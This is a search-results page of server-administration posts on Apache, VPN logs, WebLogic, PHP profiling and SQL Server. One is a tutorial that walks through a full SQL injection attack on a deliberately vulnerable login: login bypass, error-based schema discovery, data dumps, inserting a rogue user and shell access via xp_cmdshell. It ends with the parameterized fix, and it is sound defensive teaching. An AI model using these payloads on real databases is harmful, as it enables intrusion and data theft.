Search Results

Search found 94532 results on 3782 pages for 'server management'.


  • 2nd apache server fails to start

    - by ito3
    Hi, I have determined that my 2nd server fails to start because of this entry in the conf; once I remove the entry, the server starts up as normal. Alias /Reports/ "//abc/filedir/a/" <Directory "//abc/filedir/a/"> Order allow,deny Allow from all </Directory> I have a primary Apache server which also points to the folder with the same setting. I would like to know why the 2nd server fails to start; is it because server one has locked the folder? //abc is my NAS server running on Windows 2003. Thanks
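    A hedged first step (only the share path comes from the question; the commands are generic): test the configuration explicitly so Apache reports which directive it is failing on, and read the second instance's error log, rather than guessing at a lock held by the first server.

        # Run on the second server from Apache's bin directory: a config/parse
        # problem is reported here with the failing directive and line number.
        httpd -t
        # The startup error (e.g. a path or permission problem with //abc/filedir/a)
        # is usually also written to that instance's error log:
        tail logs/error.log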

    Read the article

  • How to ensure dbs are all in sync when restored?

    - by blade
    Hi, In large server environments, how do you handle the issue of backing up SQL Server dbs which may not be in sync with other dbs they rely on? If I back up DB1 from a server, and it uses another db which is not backed up, doing a restore when the dbs are in differing states could cause problems. It seems like all dependent DBs should be backed up, regardless of size etc, but in my current job (where we're a datacentre company and I'm a .NET Developer), I only back up some of several dependent DBs on a SQL Server instance. Thanks
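    One hedged way to keep the restore points of interdependent databases close together (the instance name, database names, and backup path below are placeholders, not taken from the question) is to drive all of their backups from a single script so they are taken back-to-back:

        # Back up every database in the dependency group in one pass, so a later
        # restore works from backups taken at (almost) the same point in time.
        sqlcmd -S MYSERVER -E -Q "BACKUP DATABASE [DB1] TO DISK = N'D:\Backups\DB1.bak' WITH INIT"
        sqlcmd -S MYSERVER -E -Q "BACKUP DATABASE [DB2] TO DISK = N'D:\Backups\DB2.bak' WITH INIT"

    For exact cross-database consistency, SQL Server also offers marked transactions (BEGIN TRANSACTION ... WITH MARK, restored with STOPATMARK), which let related databases be restored to the same logical point.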

    Read the article

  • Problem with setup VPN in Ubuntu Server 12.04

    - by Yozone W.
    I have a problem with setup VPN server on my Ubuntu VPS, here is my server environments: Ubuntu Server 12.04 x86_64 xl2tpd 1.3.1+dfsg-1 pppd 2.4.5-5ubuntu1 openswan 1:2.6.38-1~precise1 After install software and configuration: ipsec verify Checking your system to see if IPsec got installed and started correctly: Version check and ipsec on-path [OK] Linux Openswan U2.6.38/K3.2.0-24-virtual (netkey) Checking for IPsec support in kernel [OK] SAref kernel support [N/A] NETKEY: Testing XFRM related proc values [OK] [OK] [OK] Checking that pluto is running [OK] Pluto listening for IKE on udp 500 [OK] Pluto listening for NAT-T on udp 4500 [OK] Checking for 'ip' command [OK] Checking /bin/sh is not /bin/dash [WARNING] Checking for 'iptables' command [OK] Opportunistic Encryption Support [DISABLED] /var/log/auth.log message: Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: received Vendor ID payload [RFC 3947] method set to=115 Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: received Vendor ID payload [draft-ietf-ipsec-nat-t-ike] meth=114, but already using method 115 Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: received Vendor ID payload [draft-ietf-ipsec-nat-t-ike-08] meth=113, but already using method 115 Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: received Vendor ID payload [draft-ietf-ipsec-nat-t-ike-07] meth=112, but already using method 115 Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: received Vendor ID payload [draft-ietf-ipsec-nat-t-ike-06] meth=111, but already using method 115 Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: received Vendor ID payload [draft-ietf-ipsec-nat-t-ike-05] meth=110, but already using method 115 Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: received Vendor ID payload [draft-ietf-ipsec-nat-t-ike-04] meth=109, but already using method 115 Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: received Vendor ID payload [draft-ietf-ipsec-nat-t-ike-03] meth=108, but already using method 115 Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: received Vendor ID payload [draft-ietf-ipsec-nat-t-ike-02] meth=107, but already using method 115 Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: received Vendor ID payload [draft-ietf-ipsec-nat-t-ike-02_n] meth=106, but already using method 115 Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: ignoring Vendor ID payload [FRAGMENTATION 80000000] Oct 16 06:50:54 vpn pluto[3963]: packet from [My IP Address]:2251: received Vendor ID payload [Dead Peer Detection] Oct 16 06:50:54 vpn pluto[3963]: "L2TP-PSK-NAT"[5] [My IP Address] #5: responding to Main Mode from unknown peer [My IP Address] Oct 16 06:50:54 vpn pluto[3963]: "L2TP-PSK-NAT"[5] [My IP Address] #5: transition from state STATE_MAIN_R0 to state STATE_MAIN_R1 Oct 16 06:50:54 vpn pluto[3963]: "L2TP-PSK-NAT"[5] [My IP Address] #5: STATE_MAIN_R1: sent MR1, expecting MI2 Oct 16 06:50:55 vpn pluto[3963]: "L2TP-PSK-NAT"[5] [My IP Address] #5: NAT-Traversal: Result using draft-ietf-ipsec-nat-t-ike (MacOS X): peer is NATed Oct 16 06:50:55 vpn pluto[3963]: "L2TP-PSK-NAT"[5] [My IP Address] #5: transition from state STATE_MAIN_R1 to state STATE_MAIN_R2 Oct 16 06:50:55 vpn pluto[3963]: "L2TP-PSK-NAT"[5] [My IP Address] #5: STATE_MAIN_R2: sent MR2, expecting MI3 Oct 16 06:50:55 vpn pluto[3963]: "L2TP-PSK-NAT"[5] [My IP Address] #5: ignoring informational payload, type 
IPSEC_INITIAL_CONTACT msgid=00000000 Oct 16 06:50:55 vpn pluto[3963]: "L2TP-PSK-NAT"[5] [My IP Address] #5: Main mode peer ID is ID_IPV4_ADDR: '192.168.12.52' Oct 16 06:50:55 vpn pluto[3963]: "L2TP-PSK-NAT"[5] [My IP Address] #5: switched from "L2TP-PSK-NAT" to "L2TP-PSK-NAT" Oct 16 06:50:55 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #5: deleting connection "L2TP-PSK-NAT" instance with peer [My IP Address] {isakmp=#0/ipsec=#0} Oct 16 06:50:55 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #5: transition from state STATE_MAIN_R2 to state STATE_MAIN_R3 Oct 16 06:50:55 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #5: new NAT mapping for #5, was [My IP Address]:2251, now [My IP Address]:2847 Oct 16 06:50:55 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #5: STATE_MAIN_R3: sent MR3, ISAKMP SA established {auth=OAKLEY_PRESHARED_KEY cipher=aes_256 prf=oakley_sha group=modp1024} Oct 16 06:50:55 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #5: Dead Peer Detection (RFC 3706): enabled Oct 16 06:50:56 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #5: the peer proposed: [My Server IP Address]/32:17/1701 -> 192.168.12.52/32:17/0 Oct 16 06:50:56 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #5: NAT-Traversal: received 2 NAT-OA. using first, ignoring others Oct 16 06:50:56 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #6: responding to Quick Mode proposal {msgid:8579b1fb} Oct 16 06:50:56 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #6: us: [My Server IP Address]<[My Server IP Address]>:17/1701 Oct 16 06:50:56 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #6: them: [My IP Address][192.168.12.52]:17/65280===192.168.12.52/32 Oct 16 06:50:56 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #6: transition from state STATE_QUICK_R0 to state STATE_QUICK_R1 Oct 16 06:50:56 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #6: STATE_QUICK_R1: sent QR1, inbound IPsec SA installed, expecting QI2 Oct 16 06:50:56 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #6: Dead Peer Detection (RFC 3706): enabled Oct 16 06:50:56 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #6: transition from state STATE_QUICK_R1 to state STATE_QUICK_R2 Oct 16 06:50:56 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #6: STATE_QUICK_R2: IPsec SA established transport mode {ESP=>0x08bda158 <0x4920a374 xfrm=AES_256-HMAC_SHA1 NATOA=192.168.12.52 NATD=[My IP Address]:2847 DPD=enabled} Oct 16 06:51:16 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #5: received Delete SA(0x08bda158) payload: deleting IPSEC State #6 Oct 16 06:51:16 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #5: ERROR: netlink XFRM_MSG_DELPOLICY response for flow eroute_connection delete included errno 2: No such file or directory Oct 16 06:51:16 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #5: received and ignored informational message Oct 16 06:51:16 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address] #5: received Delete SA payload: deleting ISAKMP State #5 Oct 16 06:51:16 vpn pluto[3963]: "L2TP-PSK-NAT"[6] [My IP Address]: deleting connection "L2TP-PSK-NAT" instance with peer [My IP Address] {isakmp=#0/ipsec=#0} Oct 16 06:51:16 vpn pluto[3963]: packet from [My IP Address]:2847: received and ignored informational message xl2tpd -D message: xl2tpd[4289]: Enabling IPsec SAref processing for L2TP transport mode SAs xl2tpd[4289]: IPsec SAref does not work with L2TP kernel mode yet, enabling forceuserspace=yes xl2tpd[4289]: setsockopt recvref[30]: Protocol not available xl2tpd[4289]: This binary does not 
support kernel L2TP. xl2tpd[4289]: xl2tpd version xl2tpd-1.3.1 started on vpn.netools.me PID:4289 xl2tpd[4289]: Written by Mark Spencer, Copyright (C) 1998, Adtran, Inc. xl2tpd[4289]: Forked by Scott Balmos and David Stipp, (C) 2001 xl2tpd[4289]: Inherited by Jeff McAdams, (C) 2002 xl2tpd[4289]: Forked again by Xelerance (www.xelerance.com) (C) 2006 xl2tpd[4289]: Listening on IP address [My Server IP Address], port 1701 Then it just stopped here, and have no any response. I can't connect VPN on my mac client, the /var/log/system.log message: Oct 16 15:17:36 azone-iMac.local configd[17]: SCNC: start, triggered by SystemUIServer, type L2TP, status 0 Oct 16 15:17:36 azone-iMac.local pppd[3799]: pppd 2.4.2 (Apple version 596.13) started by azone, uid 501 Oct 16 15:17:38 azone-iMac.local pppd[3799]: L2TP connecting to server 'vpn.netools.me' ([My Server IP Address])... Oct 16 15:17:38 azone-iMac.local pppd[3799]: IPSec connection started Oct 16 15:17:38 azone-iMac.local racoon[359]: Connecting. Oct 16 15:17:38 azone-iMac.local racoon[359]: IPSec Phase1 started (Initiated by me). Oct 16 15:17:38 azone-iMac.local racoon[359]: IKE Packet: transmit success. (Initiator, Main-Mode message 1). Oct 16 15:17:38 azone-iMac.local racoon[359]: IKE Packet: receive success. (Initiator, Main-Mode message 2). Oct 16 15:17:38 azone-iMac.local racoon[359]: IKE Packet: transmit success. (Initiator, Main-Mode message 3). Oct 16 15:17:38 azone-iMac.local racoon[359]: IKE Packet: receive success. (Initiator, Main-Mode message 4). Oct 16 15:17:38 azone-iMac.local racoon[359]: IKE Packet: transmit success. (Initiator, Main-Mode message 5). Oct 16 15:17:38 azone-iMac.local racoon[359]: IKEv1 Phase1 AUTH: success. (Initiator, Main-Mode Message 6). Oct 16 15:17:38 azone-iMac.local racoon[359]: IKE Packet: receive success. (Initiator, Main-Mode message 6). Oct 16 15:17:38 azone-iMac.local racoon[359]: IKEv1 Phase1 Initiator: success. (Initiator, Main-Mode). Oct 16 15:17:38 azone-iMac.local racoon[359]: IPSec Phase1 established (Initiated by me). Oct 16 15:17:39 azone-iMac.local racoon[359]: IPSec Phase2 started (Initiated by me). Oct 16 15:17:39 azone-iMac.local racoon[359]: IKE Packet: transmit success. (Initiator, Quick-Mode message 1). Oct 16 15:17:39 azone-iMac.local racoon[359]: IKE Packet: receive success. (Initiator, Quick-Mode message 2). Oct 16 15:17:39 azone-iMac.local racoon[359]: IKE Packet: transmit success. (Initiator, Quick-Mode message 3). Oct 16 15:17:39 azone-iMac.local racoon[359]: IKEv1 Phase2 Initiator: success. (Initiator, Quick-Mode). Oct 16 15:17:39 azone-iMac.local racoon[359]: IPSec Phase2 established (Initiated by me). Oct 16 15:17:39 azone-iMac.local pppd[3799]: IPSec connection established Oct 16 15:17:59 azone-iMac.local pppd[3799]: L2TP cannot connect to the server Oct 16 15:17:59 azone-iMac.local racoon[359]: IPSec disconnecting from server [My Server IP Address] Oct 16 15:17:59 azone-iMac.local racoon[359]: IKE Packet: transmit success. (Information message). Oct 16 15:17:59 azone-iMac.local racoon[359]: IKEv1 Information-Notice: transmit success. (Delete IPSEC-SA). Oct 16 15:17:59 azone-iMac.local racoon[359]: IKE Packet: transmit success. (Information message). Oct 16 15:17:59 azone-iMac.local racoon[359]: IKEv1 Information-Notice: transmit success. (Delete ISAKMP-SA). Anyone help? Thanks a million!
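    A hedged place to look next (the commands are generic, not taken from the logs): the IPsec SA is established and then deleted about twenty seconds later, which is the usual signature of the L2TP packets inside the tunnel never reaching xl2tpd, so confirm the daemon is listening and nothing on the server is filtering UDP 1701.

        # Is xl2tpd actually bound to UDP 1701?
        sudo netstat -ulnp | grep 1701
        # Is any firewall rule dropping the decrypted L2TP traffic?
        sudo iptables -L -n -v | grep 1701
        # Watch for xl2tpd control packets while the Mac client connects
        sudo tail -f /var/log/syslog | grep xl2tpd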

    Read the article

  • SQL Server SQL Injection from start to end

    - by Mladen Prajdic
    SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage. A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to end the string column (usually username) check, continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the full original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text. SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages allow SQL Server error messages to be exposed to the user, having no input clean up or validation, allowing applications to connect with elevated (e.g. sa) privileges and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences. The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server and so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. Hopefully, all of this will be clearly demonstrated as we demonstrate two of the most common ways that enable SQL injection attacks, and how to remove the vulnerability. 1) Concatenating SQL statements on the client by hand 2) Using parameterized stored procedures but passing in parts of SQL statements As will become clear, SQL Injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem. Concatenating SQL statements on the client This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to correctly parameterize the dynamic SQL. In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First the SQL code is shown that builds the table and test data then the C# code with the actual SQL Injection example from beginning to the end. The comments in code provide information on what actually happens. /* SQL CODE *//* Users table holds usernames and passwords and is the object of out hacking attempt */CREATE TABLE Users( UserId INT IDENTITY(1, 1) PRIMARY KEY , UserName VARCHAR(50) , UserPassword NVARCHAR(10))/* Insert 2 users */INSERT INTO Users(UserName, UserPassword)SELECT 'User 1', 'MyPwd' UNION ALLSELECT 'User 2', 'BlaBla' Vulnerable C# code, followed by a progressive SQL injection attack. /* .NET C# CODE *//*This method checks if a user exists. 
It uses SQL concatination on the client, which is susceptible to SQL injection attacks*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { /* This is the SQL string you usually see with novice developers. It returns a row if a user exists and no rows if it doesn't */ string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; } }}/*The SQL injection attack example. Username inputs should be run one after the other, to demonstrate the attack pattern.*/string username = "User 1";string password = "MyPwd";// See if we can even use SQL injection.// By simply using this we can log into the application username = "' OR 1=1 --";// What follows is a step-by-step guessing game designed // to find out column names used in the query, via the // error messages. By using GROUP BY we will get // the column names one by one.// First try the Idusername = "' GROUP BY Id HAVING 1=1--";// We get the SQL error: Invalid column name 'Id'.// From that we know that there's no column named Id. // Next up is UserIDusername = "' GROUP BY Users.UserId HAVING 1=1--";// AHA! here we get the error: Column 'Users.UserName' is // invalid in the SELECT list because it is not contained // in either an aggregate function or the GROUP BY clause.// We have guessed correctly that there is a column called // UserId and the error message has kindly informed us of // a table called Users with a column called UserName// Now we add UserName to our GROUP BYusername = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";// We get the same error as before but with a new column // name, Users.UserPassword// Repeat this pattern till we have all column names that // are being return by the query.// Now we have to get the column data types. One non-string // data type is all we need to wreck havoc// Because 0 can be implicitly converted to any data type in SQL server we use it to fill up the UNION.// This can be done because we know the number of columns the query returns FROM our previous hacks.// Because SUM works for UserId we know it's an integer type. 
It doesn't matter which exactly.username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";// SUM() errors out for UserName and UserPassword columns giving us their data types:// Error: Operand data type varchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserName) FROM Users--";// Error: Operand data type nvarchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";// Because we know the Users table structure we can insert our data into itusername = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";// Next let's get the actual data FROM the tables.// There are 2 ways you can do this.// The first is by using MIN on the varchar UserName column and // getting the data from error messages one by one like this:username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";// we can repeat this method until we get all data one by one// The second method gives us all data at once and we can use it as soon as we find a non string columnusername = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";// The error we get is: // Conversion failed when converting the nvarchar value // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>// <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>// <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' // to data type int.// We can see that the returned XML contains all table data including our injected user account.// By using the XML trick we can get any database or server info we wish as long as we have access// Some examples:// Get info for all databasesusername = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";// Get info for all tables in master databaseusername = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";// If that's not enough here's a way the attacker can gain shell access to your underlying windows server// This can be done by enabling and using the xp_cmdshell stored procedure// Enable xp_cmdshellusername = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";// Create a table to store the values returned by xp_cmdshellusername = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";// list files in the current SQL Server directory with xp_cmdshell and store it in ShellHack table username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";// return the data via an error messageusername = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";// delete the table to get clean output (this step is optional)username = "'; DELETE ShellHack; --";// repeat the upper 3 statements to do other nasty stuff to the windows server// If the returned XML is larger than 8k you'll get the "String or binary data would be truncated." error// To avoid this chunk up the returned XML using paging techniques. // the username and password params come from the GUI textboxes.bool userExists = DoesUserExist(username, password ); Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as show in the following example. 
/* The fixed C# method that doesn't suffer from SQL injection because it uses parameters.*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=baltazar\sql2k8; database=tempdb; Integrated Security=SSPI;")) { //This is the version of the SQL string that should be safe from SQL injection string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; // adding 2 SQL Parameters solves the SQL injection issue completely SqlParameter usernameParameter = new SqlParameter(); usernameParameter.ParameterName = "@username"; usernameParameter.DbType = DbType.String; usernameParameter.Value = username; cmd.Parameters.Add(usernameParameter); SqlParameter passwordParameter = new SqlParameter(); passwordParameter.ParameterName = "@password"; passwordParameter.DbType = DbType.String; passwordParameter.Value = password; cmd.Parameters.Add(passwordParameter); cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists == "1"; }} We have seen just how much danger we're in, if our code is vulnerable to SQL Injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your business is only as valuable as your data. If you lose your data, you lose your business. Period. Incorrect parameterization in stored procedures It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL Injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup. 
    /*Create a single master access stored procedure*/ CREATE PROCEDURE spSingleAccessSproc( @select NVARCHAR(500) = '' , @tableName NVARCHAR(500) = '' , @where NVARCHAR(500) = '1=1' , @orderBy NVARCHAR(500) = '1') AS EXEC('SELECT ' + @select + ' FROM ' + @tableName + ' WHERE ' + @where + ' ORDER BY ' + @orderBy) GO /*Valid use as anticipated by a novice developer*/ EXEC spSingleAccessSproc @select = '*', @tableName = 'Users', @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = 'UserID' /*Malicious use SQL injection. The SQL injection principles are the same as with SQL string concatenation I described earlier, so I won't repeat them again here.*/ EXEC spSingleAccessSproc @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --', @tableName = '--Users', @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = '--UserID' One might think that this is a "made up" example but in all my years of reading SQL forums and answering questions there were quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double check. If there's even one place where you're not using properly parameterized SQL, you have a vulnerability and SQL injection can bare its ugly teeth.

    Read the article

  • July, the 31 Days of SQL Server DMO’s – Day 28 (sys.dm_db_stats_properties)

    - by Tamarick Hill
    The sys.dm_db_stats_properties Dynamic Management Function returns information about the statistics that are currently on your database objects. This function takes two parameters, an object_id and a stats_id. Let’s have a look at the result set from this function against the AdventureWorks2012.Sales.SalesOrderHeader table. To obtain the object_id and stats_id I will use a CROSS APPLY with the sys.stats system table. SELECT sp.* FROM sys.stats s CROSS APPLY sys.dm_db_stats_properties(s.object_id, s.Stats_id) sp WHERE sp.object_id = object_id('Sales.SalesOrderHeader') The first two columns returned by this function are the object_id and the stats_id columns. The next column, ‘last_updated’, gives you the date and the time that a particular statistic was last updated. The next column, ‘rows’, gives you the total number of rows in the table as of the last statistic update date. The ‘rows_sampled’ column gives you the number of rows that were sampled to create the statistic. The ‘steps’ column represents the number of specific value ranges in the statistic histogram. The ‘unfiltered_rows’ column represents the number of rows before any filters are applied. If a particular statistic is not filtered, the ‘unfiltered_rows’ column will always equal the ‘rows’ column. Lastly we have the ‘modification_counter’ column, which represents the number of modifications to the leading column in a given statistic since the last time the statistic was updated. Probably the most important column from this Dynamic Management Function is the ‘last_updated’ column. You want to always ensure that you have accurate and updated statistics on your database objects. Accurate statistics are vital for the query optimizer to generate efficient and reliable query execution plans. Without accurate and updated statistics, the performance of your SQL Server would likely suffer. For more information about this Dynamic Management Function, please see the below Books Online link: http://msdn.microsoft.com/en-us/library/jj553546.aspx Follow me on Twitter @PrimeTimeDBA
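    As a hedged illustration of day-to-day use (the server name and threshold are placeholders), the same CROSS APPLY can be run from a command line to flag statistics that have accumulated modifications since they were last updated, which can then be refreshed with UPDATE STATISTICS:

        # List statistics with outstanding modifications, oldest first.
        sqlcmd -S MYSERVER -d AdventureWorks2012 -E -Q "SELECT OBJECT_NAME(sp.object_id) AS table_name, s.name AS stat_name, sp.last_updated, sp.rows, sp.modification_counter FROM sys.stats s CROSS APPLY sys.dm_db_stats_properties(s.object_id, s.stats_id) sp WHERE sp.modification_counter > 0 ORDER BY sp.last_updated;"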

    Read the article

  • Configuring Weblogic Server 10.3.6 from 32-bit mode to 64-bit mode

    - by Ekta Malik
    This post pertains to the configuration of WebLogic Server from 32-bit mode to 64-bit mode on Solaris OS, for the case where WLS 10.3.6 is running in 32-bit mode but the JDK being used is installed for 64-bit mode. [On Solaris OS, a 64-bit JDK installation comprises installing the 32-bit JDK followed by a patch for the 64-bit JDK.]

    Verification of the mode being used. One can verify the mode of WebLogic Server in the following ways:
      - Check the commonEnv.sh script located at $MIDDLEWARE_HOME/wlserver_10.3/common/bin, where $MIDDLEWARE_HOME refers to the install directory of Middleware. Look for the parameters SUN_ARCH_DATA_MODEL and JAVA_USE_64BIT. For 32-bit mode, they appear as SUN_ARCH_DATA_MODEL="32" and JAVA_USE_64BIT=false
      - Check the server console logs to see which JDK is being used during start-up.
      - Check which JDK is used by the running process of WebLogic Server.

    Configuration steps (see the sketch below):
      - Take a backup of the commonEnv.sh script located at $MIDDLEWARE_HOME/wlserver_10.3/common/bin.
      - Modify the commonEnv.sh script so that, for 64-bit mode, the parameters read SUN_ARCH_DATA_MODEL="64" and JAVA_USE_64BIT=true
      - Restart the WebLogic server. One can confirm that the JDK being used is 64-bit by looking at the WebLogic console logs during server start-up or by looking at the running process.
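    A minimal sketch of the verification from a shell ($MIDDLEWARE_HOME and $JAVA_HOME must already point at your install):

        # Show the current mode flags in commonEnv.sh
        grep -E 'SUN_ARCH_DATA_MODEL|JAVA_USE_64BIT' $MIDDLEWARE_HOME/wlserver_10.3/common/bin/commonEnv.sh
        # Confirm the installed JDK can actually run in 64-bit mode on Solaris
        $JAVA_HOME/bin/java -d64 -version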

    Read the article

  • Php profiling on production server or other options

    - by absentx
    Alright I need some help here. I am commonly asked to speed up certain sections of some websites that I program for. I have yet to be able to figure out how to use a good php diagnosis/profiling tool. Some things to consider: The sites I am working on are already built, getting a testing server set up locally is just a huge pain..I have to rewrite include paths and just so many things. This is a results oriented deal and spending days to get a site fully working on a testing platform so I can debug one page probably isn't an option. I can write tons of php, but I have no clue how to interact or mess with servers. So every tutorial I read about setting up xdebug or xhprof all seem to involve getting something installed on a production server that I don't have access to or have no clue how to work with. So are there any solutions out there that will show me where my php is slow without having to do all sorts of server stuff that I just don't know how to do? Xhprof seems to be the closest to useable for me but from what I can tell it still has to be installed on a server. If anyone can just point me in the right direction on this I would be very grateful. Maybe getting these things put on the server isn't a big deal...but I have never interacted with server command lines or anything like that. I suppose I should start sometime but I really have no idea where to start. Plus I realize that profiling on a live platform is not the greatest idea either but I feel I am in a tough spot. I have speed issues to solve and setting up a local environment while a great idea, just doesn't seem real practical at the moment.
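    One hedged option that avoids profiling every production request (the package name and paths are the usual Debian/Ubuntu ones and may differ on your host): install Xdebug and use its trigger mode, so only requests that explicitly carry XDEBUG_PROFILE get profiled and normal traffic is untouched.

        # assumes php-pear and php5-dev are already installed
        sudo pecl install xdebug
        # Debian/Ubuntu-era config path; use the full path to xdebug.so if needed
        printf '%s\n' 'zend_extension=xdebug.so' \
          'xdebug.profiler_enable=0' \
          'xdebug.profiler_enable_trigger=1' \
          'xdebug.profiler_output_dir=/tmp/profiles' | sudo tee /etc/php5/conf.d/xdebug-profile.ini
        sudo service apache2 restart
        # Request the slow page with ?XDEBUG_PROFILE=1 and open the resulting
        # cachegrind.out.* file in webgrind or KCachegrind.

    Because only explicitly triggered requests are profiled, the overhead on the rest of the production traffic stays negligible.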

    Read the article

  • Remote server's x menus without vino, vnc etc

    - by Fredde
    A question where both Google searches and askubuntu/Ubuntu forums searches have failed, despite rephrasing the question a number of times. I have a Lubuntu server with some storage and functions, and a Lubuntu laptop. Previously, when running WinXP, I had Xming: I could start an X session on the server, get the lxpanel on the laptop, and switch between and run X programs without a hitch through the lxpanel menu. A very neat and convenient solution. However, WinXP crashed, and I moved to Lubuntu on the laptop as well. Things still work: I ssh into the server and can start X programs without a hitch. But, as with all graphical desktops, I at times need access to the LX menus on the server to find programs, and here the problems arise; most of what I found talks about installing VNC, vino etc., which are overkill and bypass the existing X integration between the machines. I would like to do as I did with Xming: see the server's menu system in my "client's" X session, just to see the server's installed software, without colliding with the laptop's X server, using them as normal X apps.
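    A hedged sketch of the Xming-like workflow using nothing but ssh's built-in X forwarding (the host and user names are placeholders; --profile LXDE is the usual Lubuntu profile name and may differ on your server):

        # Forward X11 from the server to the laptop's display
        ssh -X user@server
        # On the server, run its panel; it is drawn on the laptop's X server,
        # so its application menu lists the software installed on the server.
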